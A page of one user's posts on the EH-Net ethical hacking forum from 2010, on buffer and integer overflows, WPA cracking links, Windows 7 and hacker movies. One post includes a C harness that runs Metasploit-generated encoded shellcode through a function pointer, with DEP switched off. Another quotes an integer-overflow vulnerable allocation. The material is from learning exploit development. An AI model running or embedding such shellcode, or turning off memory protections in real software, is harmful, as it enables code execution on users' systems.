HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 39 guests and 3 members online
 
Advertisement

You are here: Home
EH-Net
May 23, 2013, 01:46:03 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
  Home Help Calendar Login Register  
  Show Posts
Pages: 1 ... 12 13 [14]
196  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Bank Security on: February 19, 2010, 09:44:19 AM
Quote from: alucian on February 19, 2010, 08:34:24 AM
Or you can try to rob an indian bank like this one:

http://www.youtube.com/watch?v=ZNT94X5SXvE

It will be way easier  Cool

That's awesome! Love it how he grabs the card from the other side  Tongue

Uhm, they would probably use lots of camera's and motion detectors.  Maybe the guards will have shotguns Cool and experimentally bred three headed guard dogs with codename Cerberus Cheesy

ZF
197  Ethical Hacking Discussions and Related Certifications / Programming / Re: a.out file in backtrack 4 on: February 19, 2010, 04:59:11 AM
Well when you compile C source code with the GCC compiler and don't specify the output file it will get the default name "a.out".

It's an binary executable file that you can run with the command "./a.out".
I'm not sure where you got this file from, so I would suggest opening it in an editor and see if you can get any hints from that.

ZF
198  Ethical Hacking Discussions and Related Certifications / Wireless / Re: cracking wpa on: February 17, 2010, 08:17:49 AM
From what I've heard and read I believe WPA-PSK is the easiest to crack using a dictionary attack with a really good wordlist.

Maybe this article will help you understand things.

http://www.smallnetbuilder.com/wireless/wireless-howto/30278-how-to-crack-wpa--wpa2

Even found an article that talks about cracking WPA in 15 minutes lol.

http://www.pcworld.com/article/153396/.html?tk=rss_news

ZF
199  Ethical Hacking Discussions and Related Certifications / Malware / Re: New Russian Botnet Tries to Kill Its Larger Rival on: February 17, 2010, 07:26:53 AM
Wow, I never knew stuff like this happened. It's like a trojan war. Sounds like a pretty advanced trojan too, I would probably be proud of it lol Tongue

ZF
200  Ethical Hacking Discussions and Related Certifications / Programming / Question about buffer overflow example. on: February 17, 2010, 07:16:17 AM
Guys, I have a question about the following example from "19 Deadly Sins of Software Security". This is the only example I'm having trouble with, I just want to make sure I fully understand.

Quoted from page 7 of the book;

Quote
The following overrun is a little more interesting:

Code:
bool CopyStructs(InputFile* pInFile, unsigned long count)
{
        unsigned long i;

        m_pStructs = new Structs[count];

        for(i = 0; i < count; i++)
        {
                    if(!ReadFromFile(pInFile, &(m_pStructs[i])))
                                   break;
        }
}

How can this fail? Consider that when you call the C++ new[] operator, it is similar to the following code:

ptr = malloc(sizeof(type) * count);

If the user supplies the count, it isn't hard to specify a value that overflows the multiplication operation internally. You'll then allocate a buffer much smaller than you need, and the attacker is able to write over your buffer. The upcoming C++ compiler in Microsoft Visual Studio 2005 contains an internal check to prevent this problem.

Is it because the count value that will be used to calculate the buffer's size can be too long? Will the size of the actual buffer will be truncated to something smaller while count remains the same?

So I wrote something to test a few theories.

Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
const unsigned long COUNT = 18446744073709551615; // Biggest possible unsigned long on my system.
char* buf = new char[COUNT];

printf("Count: %u\n", COUNT);
printf("Strlen: %i\n", strlen(buf));

unsigned long i;
for(i = 0; i < COUNT; i++)
{
buf[i] = 'A';
}
}

Debugging this gives me the following error;
"error C2148: total size of array must not exceed 0x7fffffff". The hex value of 0x7fffffffequals 2147483647 in decimal, which is the biggest possible value of a signed int.

When I change the count from 18446744073709551615 to 99999999999999999 I get the following output;

Count: 1569325055
Strlen: 1569325059

What, no errors? So obviously the new operator doesn't like to get unsigned long values Tongue And does indeed create a smaller buffer, but ALSO adjust the value of count, so that overflows don't occur in the for loop. Even when count was declared as constant. Is this because of the internal check the compiler performed? Will it just throw the C2148 error? Is this what the author was talking about?


Maybe I'm making things too complicated for myself  Lips sealed

Edit: Ugh, so I found out the Visual C++ compiler treats unsigned longs as 4 bytes. So they're like unsigned ints. I can imagine the risk when you think you're dealing with 8 bytes instead of 4.

ZF
201  Ethical Hacking Discussions and Related Certifications / Programming / Re: Testing shellcode in C/C++ on: February 15, 2010, 09:08:03 AM
Nevermind guys, I found the solution. Apparently the "Data Execution Prevention" or DEP kicked in, preventing code to run from the non-executable memory regions.

Compiling with "/NXCOMPAT:NO" prevents this from happening. Now I can finally test my shellcode  Tongue

Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

ZF
202  Ethical Hacking Discussions and Related Certifications / Programming / Testing shellcode in C/C++ on: February 15, 2010, 07:56:09 AM
Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don't really like to ask questions, because maybe I should google around some more and find out on my own. I'm not sure if there's something wrong with the shellcode because I don't know how to write it yet.

Heres my code, I compiled it with Microsoft Visual C++ 2008.

Code:
#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int  main()
{
void (*shell)(); // Function pointer.
        shell = (void(*)()) (&shellCode);

printf("Shellcode at: %p\n", shellCode);
printf("Function pointer points to: %p\n", shell);

// Run it!
        printf("Running shellcode...\n");
shell();

        return 0;
}


And I'm getting this from the assembly. I see it fails after the call to the shellcode.

Code:
                      // Run it!
                       shell();
                       008813FC 8B F4            mov         esi,esp
                       008813FE FF 55 F8         call        dword ptr [shell]
breaks here --> 00881401 3B F4            cmp         esi,esp
                       00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)


I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

ZF
203  Ethical Hacking Discussions and Related Certifications / OS / Re: Windows 7 on: February 15, 2010, 06:46:59 AM
Well I think it's pretty good. I've been using win xp for ages and didn't really want to upgrade at first. Windows 7 is probably a bit slower, but I like all the features it offers and of course it's more visually appealing Tongue It still seems to be faster than Vista at least. My hardware is pretty good so I didn't really notice a difference in performance. Thought Windows 7 booted a bit slower, but most of my applications seem to load faster.

Also Windows 7 automatically found all my drivers and gives me the updates for them. Every time I install XP for someone I have to search the internet for the right drivers, because the person lost all his CD's and backups.

I think this really depends on what you expect from the OS and what your needs are. I use my system for everything, from development to gaming and I've never had a problem with Windows 7.

ZF
204  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Web Applications PenTesting Methodology on: February 14, 2010, 08:52:58 AM
Well if you're going to audit the source code, then I guess you could scan the code for possibly dangerous functions that perform jobs such as string concatenation or forms that allow users to upload files to the server. Also find out how the applications deals with sessions.

Because you already suspect some XSS and SQL injection vulnerabilities, I would mark all input fields and other possible entry points. Then find out how the code deals with those. Document all your findings, explain the vulnerabilities and how to fix them.

I don't know much about good tools, but I've used Acunetix Web Vulnerability Scanner last year and was very pleased with the results.

You probably figured most of this out already, but I'm just trying to help Tongue

ZF
205  Resources / Mass Media / Re: Good hacker movies? on: February 13, 2010, 04:39:31 PM
Alright! Thanks guys.

I'll watch Sneakers and Die Hard 4 tonight  Cool

Then I'll check some of the other movies tomorrow when I find time.

I've been wanting to watch '24' but I always end up watching something else lol.

ZF
206  Resources / Mass Media / Good hacker movies? on: February 13, 2010, 10:00:39 AM
Hey guys,

I was just wondering if anyone knows some good movies that involve hacking and maybe some espionage Tongue

I've seen Hackers and Swordfish. I kinda liked Swordfish and I find Hackers a bit lame but still entertaining.

ZF
207  EH-Net / News Items and General Discussion About EH-Net / Re: Hey I'm new :P on: February 12, 2010, 12:31:16 PM
Thanks for the welcomes!

Well as for college, maybe should have mentioned that I'm almost done with it. I have some exams to pass and then I'll be doing my final internship or whatever it's called. I still have to apply somewhere but hopefully they will appreciate the work and offer me a job  Cool I kinda regret fooling around a lot and not paying attention to classes.

I'm not sure if I want to become a developer or do something with security. I can always make either one of them a hobby Tongue Or end up doing both anyway.

Thanks again, this really seems to be a nice place Cool

ZF
208  EH-Net / News Items and General Discussion About EH-Net / Hey I'm new :P on: February 12, 2010, 10:13:49 AM
Hello guys,

Just thought I'd post here and introduce myself Tongue Well I'm 24 years old and I live in the Netherlands. I've always been fascinated by computers, technologies and weird theories such as time travel lol. I'm still at college because I skip any class that seems boring to me and generally don't pay much attention anyhow (maybe I'm a bit of an ADD person). So I failed a couple of times, oh well. I'm mostly interested in programming, security and a bit of networking (though I find CISCO classes very boring).

I started learning stuff about security about one year ago, bufferoverflows, sql injection etc. Feels like I've learned a lot, but there's still way too much that I don't even have a clue about. So I started looking into reverse engineering and cryptography, which will hopefully improve my chance of actually finding new security holes.

I've come to realize that I'm doing all the research and studying on my own and never actually talk about it with others. Maybe I should be part of a community or something, not sure Tongue Wanting to reach the next level and maybe someday make a living out of it.


ZF
Pages: 1 ... 12 13 [14]
Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.107 seconds with 21 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.